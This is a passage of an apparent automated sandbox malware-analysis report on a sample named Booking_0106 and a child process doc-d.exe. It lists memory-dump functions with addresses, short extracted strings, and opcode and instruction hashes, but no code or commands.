Opcode Fuzzy Hash: 0912b5cbcb59f13d7a91dd8a41e3b1ab8bc624dca1d0808d4ddab8006513bded
Instruction Fuzzy Hash: D9C08C300093804FCF024B30844C0603FB0AD0322131840DAC491CB063E2282802EB22

Function 059ECEB0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 059EA9E2 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e896a75dc2af4247b064891e330e78eaaeed58f04b3a0ec01b92df23a29d833
Instruction ID: 8f78f30d7f419cdea8c655354a1c87823714ecb5a29bdefb842b9fac1938b01e
Opcode Fuzzy Hash: 5e896a75dc2af4247b064891e330e78eaaeed58f04b3a0ec01b92df23a29d833
Instruction Fuzzy Hash: F3A002161129591FF60123F2DE877555055DB82911FE8C1A45546C3BC0C50DA49349AA

Non-executed Functions

Function 05950040 Relevance: 3.8, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

R, xrefs: 059509C5
c, xrefs: 05950999
4, xrefs: 0595010F

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4$R$c
API String ID: 0-4156095144
Opcode ID: e661970aed8303533c546c4892ea597d5ff42201f39021202ab31d76b5c72287
Instruction ID: cd79b3e5c6af12fb1a47a7d99d7002ee1ef06aa871ef2d365673a6bd1728ce27
Opcode Fuzzy Hash: e661970aed8303533c546c4892ea597d5ff42201f39021202ab31d76b5c72287
Instruction Fuzzy Hash: 8D318D71D056198BEB58DF6B894939AFBF7AFC8310F14C1BA880CA6214DB300A95CF11

Function 059E3748 Relevance: 2.8, Strings: 2, Instructions: 340COMMON

Download Yara Rule

Strings

(bq, xrefs: 059E3AEC
,bq, xrefs: 059E383E

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$,bq
API String ID: 0-1616511919
Opcode ID: e59045f3333dca0544cca9a5b186b07d1ad40dc037463ab85fe103da1e088c84
Instruction ID: 1d5b13915e3bf5bbc9550821d9f005055552430a0d5bd6dad7e49ac1b9731a1a
Opcode Fuzzy Hash: e59045f3333dca0544cca9a5b186b07d1ad40dc037463ab85fe103da1e088c84
Instruction Fuzzy Hash: AFD11934A00505DFCB15DF69C584AAAB7F6FF88310F69C9A9E406AB365CB35EC81CB50

Function 01432428 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

, xrefs: 0143253E
Nk, xrefs: 014324D9

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: $Nk
API String ID: 0-3487173116
Opcode ID: 61e047a733e8d8c783d5077dd6974cfe463aad0f74f9bd66f066bc5b9dde00d5
Instruction ID: 53734b0c0e982bce96925e5adcd80beb144b0fbc40f62bdfcc17a840663ca40f
Opcode Fuzzy Hash: 61e047a733e8d8c783d5077dd6974cfe463aad0f74f9bd66f066bc5b9dde00d5
Instruction Fuzzy Hash: E051D031F402158FCB14CBADD8849AEB7F2FBC8211B15857AD50AD73A9DB30ED428B91

Function 0595BD65 Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

0, xrefs: 0595D1D0
k, xrefs: 0595D1A0

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: 0$k
API String ID: 0-4037174772
Opcode ID: 23da8bd7f849d02d6978905dab4bf52a9cbc47bf6711caa3ae6cf05533b5373b
Instruction ID: 976cb0451d96efb2976ce6db26735c848e726da32c44c1f19223bd6ab00cd8af
Opcode Fuzzy Hash: 23da8bd7f849d02d6978905dab4bf52a9cbc47bf6711caa3ae6cf05533b5373b
Instruction Fuzzy Hash: C4613E74E152288FEBA0CF68D985B8DBBF1BB48314F1481D9D51CE7212D7309A96CF14

Function 05A323F8 Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

(bq, xrefs: 05A324C8

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: dc44b3fe9c3a51e1d979dbbceb8cbb5ecc4a33b4ef2ee56a536273baf0fed9a8
Instruction ID: cea50d10520e4b246ac510605b71d21933c2366d41ecd5fe3f7092dd7becb108
Opcode Fuzzy Hash: dc44b3fe9c3a51e1d979dbbceb8cbb5ecc4a33b4ef2ee56a536273baf0fed9a8
Instruction Fuzzy Hash: 4C326A78B056158FCB59CF69C495B6EFBF2FF88304F248529E55A97381DB34A841CB80

Function 05C7F038 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C7F0CC

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 8dceb2bc3c310663b7724e847043aa8f5dd8087b2ca9bcca10950bf9c8467a3e
Instruction ID: b2374892557e43412c337e4dd39449d29f7e477b7f6ab60bc49434af49ccefaf
Opcode Fuzzy Hash: 8dceb2bc3c310663b7724e847043aa8f5dd8087b2ca9bcca10950bf9c8467a3e
Instruction Fuzzy Hash: D1B1F174E0421CCFDB24CFAAD884BADBBF2BB89304F1094AAD509AB655DB755D85CF00

Function 05A358C8 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

dbq, xrefs: 05A35B28

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: 770e5a279b6307757d270f3dee6cf00e1fb969569dbace948cc0da869a0a25c0
Instruction ID: f5bb0f3a7aff76939a75b85dd74115d208f0c8f009f7747728c5b9a50bc682da
Opcode Fuzzy Hash: 770e5a279b6307757d270f3dee6cf00e1fb969569dbace948cc0da869a0a25c0
Instruction Fuzzy Hash: 8381F574D15208CFDB14DFA9D949BADBBF2FB89308F10816AE409A7294EB745E85CF01

Function 05A358B8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

dbq, xrefs: 05A35B28

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: b6eb043e8989977388a631f850660c90e7b2aaa4cee2dcdbc4cdcefca2369381
Instruction ID: cf432707e485515e25db6e17a4f20b1b71bfa25e319cb362f5e2b5da51bc7815
Opcode Fuzzy Hash: b6eb043e8989977388a631f850660c90e7b2aaa4cee2dcdbc4cdcefca2369381
Instruction Fuzzy Hash: 0481F674D15208CFDB14DFA9D949BADBBF2FB89308F10816AE409A7294EB745E85CF01

Function 059F0006 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

d, xrefs: 059F01BC

Memory Dump Source

Source File: 00000000.00000002.1732067452.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59f0000_Booking_0106.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c5d792f66ed7138f3b151cf0d43b16a11c173dad0a40dc67b4e7cf53387114bb
Instruction ID: eef22112ecea02e0b383a56e6b8ff785cdc71a334df3e57987c7327b278a9806
Opcode Fuzzy Hash: c5d792f66ed7138f3b151cf0d43b16a11c173dad0a40dc67b4e7cf53387114bb
Instruction Fuzzy Hash: 62519071D056548BE769CF6B8D452CAFBF3AFC9300F08C1FA854CAA265DA7009C68F11

Function 059F0040 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

d, xrefs: 059F01BC

Memory Dump Source

Source File: 00000000.00000002.1732067452.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59f0000_Booking_0106.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 784b97a075ac8bda820d326ffb1e4e6d5d5efa0f61bb09bccf48a530ef8a97b2
Instruction ID: 82f82151b4fd56b0953467efe877a2263b4afdad41afa58b397c40a8dde83b77
Opcode Fuzzy Hash: 784b97a075ac8bda820d326ffb1e4e6d5d5efa0f61bb09bccf48a530ef8a97b2
Instruction Fuzzy Hash: 87513B71D056588BEB68CF6B9D446CAFAF7AFC8300F04C1FA994DA6254EB700AC58F51

Function 05957601 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

`, xrefs: 059576F7

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 7ea9ad0c55b330f223cfd5de7c41833c85f4ae68b20df6c7a66e2d6328dcc99a
Instruction ID: 4c54a634fdbd892c7639ee8f24ff05f4d624ffb37539b47c65ce55a07e33023b
Opcode Fuzzy Hash: 7ea9ad0c55b330f223cfd5de7c41833c85f4ae68b20df6c7a66e2d6328dcc99a
Instruction Fuzzy Hash: 08416271E05A189BEB1CCF6B9D4069EFAF7AFC9211F18C1B9980CAB255DB3009568F11

Function 05950006 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

4, xrefs: 0595010F

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: cfade868b0b6f70bf19531698cd5b3560e6e591ad367ff9080f77009ed5381f2
Instruction ID: 99c0d47b9d168f31af330cb660305abdbba483c70e36f0caa02446911572a664
Opcode Fuzzy Hash: cfade868b0b6f70bf19531698cd5b3560e6e591ad367ff9080f77009ed5381f2
Instruction Fuzzy Hash: E131DC71D056588FDB59CF2B8D59399BBF7AFC9300F18C1FA884CAA265DA340A85CF11

Function 05955790 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4033d52fb6c4ea198093766783a10605207f5fea99c4a3f0a82341962bc5de3e
Instruction ID: 03b1ab91e50b2475bca351a9c1a1f6fcc2d37bf66a724e5b5d8cd0e621dc45e3
Opcode Fuzzy Hash: 4033d52fb6c4ea198093766783a10605207f5fea99c4a3f0a82341962bc5de3e
Instruction Fuzzy Hash: FC12B270E056198FDB14CFAAC98069DFBF2BF88314F28C169D419EB21AD734A946CF54

Function 014320F1 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81b29b131cab770d1c5f6d1b1be05767117bf5ce0ad43d0e7180e909e4850ef
Instruction ID: f41bf17b8afc5dc4deefcdf704a7733a5480cfa9a6a43e394984a66eb8448a0c
Opcode Fuzzy Hash: e81b29b131cab770d1c5f6d1b1be05767117bf5ce0ad43d0e7180e909e4850ef
Instruction Fuzzy Hash: 12816D36F105159FD754DB69DC84A6EB7F3AFC8710F1A8169E40ADB365DA70AC028B80

Function 05A23A88 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849e1b1dd713fca73fe718efa3a6fad03022a4d34711b5c22ff80b96dbefc854
Instruction ID: 662b7044bf472cfc754afc2c39888a96942f9f5fbeb741bee269c4205a1646cf
Opcode Fuzzy Hash: 849e1b1dd713fca73fe718efa3a6fad03022a4d34711b5c22ff80b96dbefc854
Instruction Fuzzy Hash: 0F912770E05218CFDB14DF69D489BADBBF2FF4A304F10956AD019A7294DB799989CF00

Function 05A23A7A Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a1037942cca2cf1f6575cc9e8079807a3be2c72011e8da0582caa5a6f45dc5
Instruction ID: 71c3d15015039b2ec960e404395cf3dc723b16ae24a3ca5307e077ee5ec4672f
Opcode Fuzzy Hash: 61a1037942cca2cf1f6575cc9e8079807a3be2c72011e8da0582caa5a6f45dc5
Instruction Fuzzy Hash: A2913870E05218CFDB14DF69D489BADBBF2FF4A304F10956AD009A7294DB799989CF00

Function 05C7D1A0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb70726015dd1c61e4bcb8f643643b13282ec519c08910a9105c9e10cdb6be20
Instruction ID: c95a1250a62ec1764030d5c32ea8d163e27c57be4a482c620bc76375d4c1a76b
Opcode Fuzzy Hash: eb70726015dd1c61e4bcb8f643643b13282ec519c08910a9105c9e10cdb6be20
Instruction Fuzzy Hash: 97910470D0522CCFDB24DF6AC844BADBBF6BF89310F1098A9D40AAB650DB745A85CF11

Function 05A23B84 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ef4f7f2e3afdc3e1a21e6147e5be0c49163add1d654faea5892f0a31d255ab
Instruction ID: d8a1ce0c7976f7de311f54cf232655e2d664d096ced454bd5d329f35f58ad958
Opcode Fuzzy Hash: f9ef4f7f2e3afdc3e1a21e6147e5be0c49163add1d654faea5892f0a31d255ab
Instruction Fuzzy Hash: 99912470E05218CFDB14DFA9D489BADBBF2FF4A304F10856AD009A7294DB799989CF00

Function 05A23D27 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e5b9c64b138f82c59219de6a062cd84927271d37b320f13c275a26b4897313
Instruction ID: 42851ba67d52a0b34f093a2168952bd74c5ae6c64da5241dca92828345d3de6b
Opcode Fuzzy Hash: a0e5b9c64b138f82c59219de6a062cd84927271d37b320f13c275a26b4897313
Instruction Fuzzy Hash: 26813974E05218CFDB14DFA9D499BADBBF2FF4A304F10856AD009A7254DB799989CF00

Function 014321A1 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d8e70e1681f19292c7070de7ea4f13d1d897e7aa082e68ec7bae0edf2a2ce0
Instruction ID: eaaf976fc6c6dafb484bfe5f620521c7edb0f6d0b3f03cdd6fca91cfe51fddee
Opcode Fuzzy Hash: 75d8e70e1681f19292c7070de7ea4f13d1d897e7aa082e68ec7bae0edf2a2ce0
Instruction Fuzzy Hash: D1613B36F105258FD754DB69CC84A6EB7E3AFC8610F1A8165E40ADB369DE74EC028B80

Function 05A36428 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a294e17d8c4f4df106d80c4253dcbeaae54a2b0e8f6f92f35f8a1f36f18998
Instruction ID: fa64eca690b71c3e477713d368d14faa9342adcd4d95d7fc7d64259bd511870e
Opcode Fuzzy Hash: 15a294e17d8c4f4df106d80c4253dcbeaae54a2b0e8f6f92f35f8a1f36f18998
Instruction Fuzzy Hash: FA5134B4D06208DFCB14CFA9E559BEDBBF2FB49308F10502AE519A7294DBB55946CF00

Function 05A36438 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c53de0b80c96b3eddb0bcf0d2f9bed9ff20be7f0dff92be24f8c485dccc325d
Instruction ID: 74ce6755f4bdbb5320b4158ac2d3a3a83a855183f754d7e92c23c713fb50b23b
Opcode Fuzzy Hash: 8c53de0b80c96b3eddb0bcf0d2f9bed9ff20be7f0dff92be24f8c485dccc325d
Instruction Fuzzy Hash: 875124B4D06208DFCB14DFA9E549BEDBBF2FB49308F10502AE519A7294DBB55946CF00

Function 05955780 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e466f11e931a703f72d76509d746097526097232167b1749273b11813bac39d2
Instruction ID: 774d311f133fe21a6834b7f43725281641d501249a809b5cff3c548dd7543439
Opcode Fuzzy Hash: e466f11e931a703f72d76509d746097526097232167b1749273b11813bac39d2
Instruction Fuzzy Hash: FF4154B1E016198BDB18CFABD94069EFBF7BFC8310F14C07AD908AB218DB3059468B54

Function 059FD838 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732067452.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59f0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36128b95a48b87d8af547fb34d838748c7303df645973b655d71608752e3bba2
Instruction ID: e5f7d1a87253a8964111926f096a7110d58772e9c839745a75e28e2c22a86564
Opcode Fuzzy Hash: 36128b95a48b87d8af547fb34d838748c7303df645973b655d71608752e3bba2
Instruction Fuzzy Hash: BF41DDB4D043489FDB14DFA9D884BAEBBF5BB09310F209129E419AB350D7789885CF45

Function 0143E858 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4bf992a20b85621c2ada6a2713597c9eabba6cbe45744efb600baad8eb853b
Instruction ID: 6928c01a4fe9f62704e64ac70347aab8fb227e87e045a1818a6dd8c536ca4b2d
Opcode Fuzzy Hash: ea4bf992a20b85621c2ada6a2713597c9eabba6cbe45744efb600baad8eb853b
Instruction Fuzzy Hash: 6C41C870E05658CBDB58CF6AC9446DABBF2AFCD300F14C1AAD409A7264DB355A85CF00

Function 05A22AC8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ae41ecf7034d3b76fbe831d68de41c4c5337f8175b173cc241abaa569f9ccd
Instruction ID: a22b80437de42cfa530eae7cb0fd01d6b489748d748b6e2919944879809fa5f2
Opcode Fuzzy Hash: d5ae41ecf7034d3b76fbe831d68de41c4c5337f8175b173cc241abaa569f9ccd
Instruction Fuzzy Hash: A941DEB9D04258DFCB10CFA9D585AEEFBF0AF09310F14942AE455B7240C738AA85CF68

Function 05A22AD0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4069ac1bcba2c8db3e58e24315ac926532ba41247802ed4c4d55770a3a742204
Instruction ID: 5c28a2a7d5bdd6f3835451eb7665e607a33aba8eead29da6a0996142b4a438c5
Opcode Fuzzy Hash: 4069ac1bcba2c8db3e58e24315ac926532ba41247802ed4c4d55770a3a742204
Instruction Fuzzy Hash: ED41EFB5D04258DFCB10CFA9D484AEEFBF0AF49310F14902AE455B7240C738AA85CF68

Function 01434420 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09b63271002f726a57f0b6711ca60794ce2797714375e3df5827d031979ca39
Instruction ID: b9cba7dd95451650f4c8bcc7bda53c55a56270b64fd6611b34c896b4dba1e341
Opcode Fuzzy Hash: e09b63271002f726a57f0b6711ca60794ce2797714375e3df5827d031979ca39
Instruction Fuzzy Hash: 1D318DB1D066188BEB68CF6BC95479DFAF7BFC8304F14C1AAC40C66265DB740A858F51

Function 05A39950 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4866979e2f93126528251c010a269d0c1611fdb2dab03e8aea42df52dd93e27c
Instruction ID: 4da038b1c66a9eb774be7fe1c7a33c3c489e7f4896a9e24cec0e1c634d90536b
Opcode Fuzzy Hash: 4866979e2f93126528251c010a269d0c1611fdb2dab03e8aea42df52dd93e27c
Instruction Fuzzy Hash: 82313E71D092588FEB19CFAAD8507CEBFB2AF89314F04C0A6D048AB255DB740946CF11

Function 05A3E009 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0c0178f70ca8d84fc5febe37bb8954b10e7605d08f3d0ed1be81a887eb86f4
Instruction ID: a52730868df399dec5e528d3774778489d8b268a0b2757ace27413d01c547f40
Opcode Fuzzy Hash: 3d0c0178f70ca8d84fc5febe37bb8954b10e7605d08f3d0ed1be81a887eb86f4
Instruction Fuzzy Hash: 8A210DB5C04258CFCB10CFA9D981AEEFBF0BB49314F14906AE859B7210C735A945CFA8

Function 05A3E010 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566f795899923b34940bb0061bb0af6b78e96e3b6ae83c61b295bcf6874230c6
Instruction ID: 21acfa327bca8195fdd51423353029433ae0899893f779ad96e34bf4a7b6ea00
Opcode Fuzzy Hash: 566f795899923b34940bb0061bb0af6b78e96e3b6ae83c61b295bcf6874230c6
Instruction Fuzzy Hash: 7A21EFB5D042189FCB10CFA9D981AEEFBF4FB49310F10906AE805B7210C7356945CFA8

Function 05A39978 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 481fb7f616355d93ef89f4196d7487d6fd931bd5cd9f926ecdb110f5394265d8
Instruction ID: aa0a81971af500df23cb88b96bdafca06ae6302a183ed60f343fe25ddc801149
Opcode Fuzzy Hash: 481fb7f616355d93ef89f4196d7487d6fd931bd5cd9f926ecdb110f5394265d8
Instruction Fuzzy Hash: 2121E771D056188BEB18CF9BE8447DEFBF7AFC8314F14C16AE409A6254DB7409468F40

Analysis Process: doc-d.exePID: 7588, Parent PID: 7532COMMON

Executed Functions

Function 00A11080 Relevance: 3.1, Strings: 2, Instructions: 576COMMON

Download Yara Rule

Strings

\s^q, xrefs: 00A11327
LR^q, xrefs: 00A11156

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 2d98ef49fba5ab30d835144273c0c2290f2b563b1adbb5df5731f04133d3b9f8
Instruction ID: d9f8b5785ed8b11306b64ecec54a5159efe2876b9c5910dc7b01c2964cb905c1
Opcode Fuzzy Hash: 2d98ef49fba5ab30d835144273c0c2290f2b563b1adbb5df5731f04133d3b9f8
Instruction Fuzzy Hash: CE325A74E112298FDB24DF69D884AADB7F2BF88304F15C569D41AEB354DB30A981CF90

Function 00A11071 Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

\s^q, xrefs: 00A11327
LR^q, xrefs: 00A11156

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
